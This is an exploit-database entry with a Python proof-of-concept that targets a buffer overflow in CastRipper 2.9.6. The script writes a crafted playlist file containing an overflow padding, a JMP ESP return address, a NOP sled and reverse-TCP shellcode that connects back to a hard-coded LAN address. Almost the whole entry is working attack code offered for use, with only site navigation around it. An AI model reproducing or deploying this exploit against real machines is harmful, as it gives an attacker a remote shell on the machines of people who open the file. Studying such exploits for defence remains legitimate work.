Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtCaddy-Dz1337DAY-ID-18028
HistoryApr 10, 2012 - 12:00 a.m.

CastRipper 2.9.6 (.pls)/(wvx) buffer overflow Exploit

2012-04-1000:00:00
Caddy-Dz
0day.today
24
JSON

Exploit for windows platform in category local exploits

####
# Exploit Title: CastRipper 2.9.6 (.pls)/(wvx) buffer overflow Exploit
# Author: Caddy-Dz
# Facebook Page: http://www.facebook.com/ALG.Cyber.Army
# E-mail: islam_babia[at]hotmail.com
# Vendor: http://mini-stream.net/castripper/
# Category:: Local Exploits
# Tested on: VMWare Workstation [Windows Xp Sp 2 / French]
####

# Sp Greets : klashincov3 , KedAns-Dz , Kha&Mix , King Of Pirates , The Algerian Cyber Army Team ... All Algerian Hax0rs
#!/usr/bin/python

header='<asx version = "3.0" >\n'
header2="<title>Cantonese 16 14-15</title>\n"
header3="<entry>\n"
href='<ref href="'
bof='A' * 26065
eip='\x78\x9c\x0b\x7d' # 7d0b9c78   FFE4     JMP ESP   shell32.dll
nop='\x90' * 16
shellcode=(
#Payload windows/shell/reverse_tcp {LHOST=192.168.81.128, LPORT=110, Encoder=generic/none} 290 bytes.

"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31"
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52"
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1"
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52"
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b"
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b"
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3"
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b"
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b"
"\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68"
"\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07"
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54"
"\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50"
"\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf"
"\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x51"
"\x80\x68\x02\x00\x00\x6e\x89\xe6\x6a\x10"
"\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85"
"\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0"
"\xb5\xa2\x56\xff\xd5\x6a\x00\x6a\x04\x56"
"\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x36"
"\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00"
"\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a"
"\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff"
"\xd5\x01\xc3\x29\xc6\x85\xf6\x75\xec\xc3")

end="\n</entry>"
end1="\n</asx>"
out_file = open("caddy.pls",'w') # you can edit the extention .pls to .wvx
out_file.write(header+header2+header3+href+bof+eip+nop+shellcode+end+end1)
out_file.close()



#  0day.today [2018-01-02]  #
JSON